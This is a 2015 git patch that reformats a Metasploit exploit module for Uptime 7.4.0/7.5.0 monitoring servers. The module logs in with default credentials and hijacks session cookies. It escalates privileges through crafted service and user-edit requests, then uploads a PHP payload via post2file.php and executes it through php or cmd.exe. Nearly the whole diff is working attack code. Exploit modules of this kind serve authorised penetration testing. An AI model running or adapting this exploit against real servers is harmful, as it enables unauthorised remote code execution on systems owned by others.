From 5539363218f1815d762b8ece7419351414a80ce7 Mon Sep 17 00:00:00 2001 From: "Ewerson Guimaraes (Crash)" Date: Fri, 23 Oct 2015 11:33:59 +0200 Subject: [PATCH] Update uptime_code_exec.rb --- .../exploits/multi/http/uptime_code_exec.rb | 106 +++++++++--------- 1 file changed, 55 insertions(+), 51 deletions(-) diff --git a/modules/exploits/multi/http/uptime_code_exec.rb b/modules/exploits/multi/http/uptime_code_exec.rb index 460042675f..b0fe4b0ce3 100644 --- a/modules/exploits/multi/http/uptime_code_exec.rb +++ b/modules/exploits/multi/http/uptime_code_exec.rb @@ -10,44 +10,45 @@ class Metasploit4 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Uptime Version 7.4.0 / 7.5.0 Upload and Exec file', - 'Description' => ' - This module exploits a vulnerability found in Uptime - version 7.4.0 and 7.5.0 By supplying a specially - crafted request is possible to upload file and execute - arbitrary commands through privilege escalation. - ', - 'License' => MSF_LICENSE, - 'Author' => [ - 'Ewerson Guimaraes(Crash) ', - 'Gjoko Krstic(LiquidWorm) ' - ], - 'References' => [ - ['URL', 'https://www.exploit-db.com/exploits/37888/'] - ], - 'Payload' => { - 'Space' => 100_000, - 'DisableNops' => true - }, - 'Platform' => ['php'], - 'Arch' => ARCH_PHP, - 'Targets' => [ - ['Automatic', {}] - ], - 'DefaultOptions' => { - 'SSL' => false - }, - 'Privileged' => 'True', - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Aug 6 2015' - )) + 'Name' => 'Uptime Version 7.4.0 / 7.5.0 Upload and Exec file', + 'Description' => %q{ + This module exploits a vulnerability found in Uptime + version 7.4.0 and 7.5.0 By supplying a specially + crafted request is possible to upload file and execute + arbitrary commands through privilege escalation. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Ewerson Guimaraes(Crash) ', + 'Gjoko Krstic(LiquidWorm) ' + ], + 'References' => + [ + ['EDB', '37888'] + ], + 'Payload' => + { + 'Space' => 100_000, + 'DisableNops' => true + }, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => [['Automatic', {}]], + 'DefaultOptions' => + { + 'SSL' => false + }, + 'Privileged' => 'True', + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Aug 6 2015')) - register_options([ - Opt::RPORT(9999), - OptString.new('USERNAME', [true, 'The username to authenticate as', 'sample']), - OptString.new('PASSWORD', [true, 'The password to authenticate with', 'sample']) - - ], self.class) + register_options( + [ + Opt::RPORT(9999), + OptString.new('USERNAME', [true, 'The username to authenticate as', 'sample']), + OptString.new('PASSWORD', [true, 'The password to authenticate with', 'sample']) + ], self.class) end # Application Check def check @@ -57,7 +58,7 @@ class Metasploit4 < Msf::Exploit::Remote ) vprint_status("#{peer} - Checking version...") - if !res.nil? && res.code == 200 && (res.body.include?('up.time 7.5.0') || res.body.include?('up.time 7.4.0')) + if res && res.code == 200 && (res.body.include?('up.time 7.5.0') || res.body.include?('up.time 7.4.0')) return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe @@ -76,21 +77,23 @@ class Metasploit4 < Msf::Exploit::Remote # #Check OS # phpfile_name = rand_text_alpha(10) - if !res_auth.nil? && res_auth.headers['Server'] =~ /Unix/ + if res_auth && res_auth.headers['Server'] =~ /Unix/ vprint_status('Found Linux installation - Setting appropriated PATH') phppath = '/usr/local/uptime/apache/bin/php' uploadpath = '/usr/local/uptime/GUI/wizards' - cmdargs = uploadpath + '/' + phpfile_name + '.txt' +## cmdargs = uploadpath + '/' + phpfile_name + '.txt' + cmdargs = "#{uploadpath}#{phpfile_name}.txt" cmd = phppath else vprint_status('Found Windows installation - Setting appropriated PATH') phppath = 'C:\\Program Files\\uptime software\\uptime\\apache\\php\\php.exe' - uploadpath = 'C:\\Program Files\\uptime software\\uptime\\GUI\\wizards' + uploadpath = 'C:\\Program Files\\uptime software\\uptime\\GUI\\wizards\\' cmd = 'c:\\windows\\system32\\cmd.exe' - cmdargs = '/K "' + '"' + phppath + '" ' + '"' + uploadpath + '\\' + phpfile_name + '.txt' + '"' + '"' +## cmdargs = '/K "' + '"' + phppath + '" ' + '"' + uploadpath + '\\' + phpfile_name + '.txt' + '"' + '"' + cmdargs = "/K \"\"#{phppath}\" \"#{uploadpath}#{phpfile_name}.txt\"\"" end - if !res_auth.nil? && res_auth.get_cookies =~ /login=true/ + if res_auth && res_auth.get_cookies =~ /login=true/ cookie = Regexp.last_match(1) cookie_split = res_auth.get_cookies.split(';') vprint_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}") @@ -119,7 +122,7 @@ class Metasploit4 < Msf::Exploit::Remote 'subsection' => 'edit', 'id' => "#{get_id}" }, - 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", + 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'vars_post' => { 'operation' => 'submit', 'disableEditOfUsernameRoleGroup' => 'false', @@ -152,7 +155,7 @@ class Metasploit4 < Msf::Exploit::Remote res_priv = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php?loggedout'), - 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}" + 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}" ) res_auth = send_request_cgi( @@ -163,7 +166,7 @@ class Metasploit4 < Msf::Exploit::Remote 'password' => datastore['PASSWORD'] } ) - if !res_auth.nil? && res_auth.get_cookies =~ /login=true/ + if res_auth && res_auth.get_cookies =~ /login=true/ cookie = Regexp.last_match(1) cookie_split = res_auth.get_cookies.split(';') vprint_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}") @@ -177,10 +180,10 @@ class Metasploit4 < Msf::Exploit::Remote res_service = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'main.php'), - 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", + 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'vars_get' => { 'section' => 'ERDCInstance', - 'subsection' => 'add' + 'subsection' => 'add', }, 'vars_post' => { 'initialERDCId' => '20', @@ -261,7 +264,7 @@ class Metasploit4 < Msf::Exploit::Remote end # CREATING Linux EXEC Service - if !res_auth.nil? && res_auth.headers['Server'] =~ /Unix/ + if res_auth && res_auth.headers['Server'] =~ /Unix/ vprint_status('Creating Linux Monitor Code exec...') create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs) @@ -277,7 +280,8 @@ class Metasploit4 < Msf::Exploit::Remote 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'wizards', 'post2file.php'), 'vars_post' => { - 'file_name' => phpfile_name + '.txt', +## 'file_name' => phpfile_name + '.txt', + 'file_name' => "#{phpfile_name}.txt", 'script' => payload.encoded } ) @@ -288,7 +292,7 @@ class Metasploit4 < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, 'wizards', "#{phpfile_name}.txt") ) - if !res_up_check.nil? && res_up_check.code == 200 + if res_up_check && res_up_check.code == 200 print_good("File found: #{phpfile_name}") else print_error('File not found')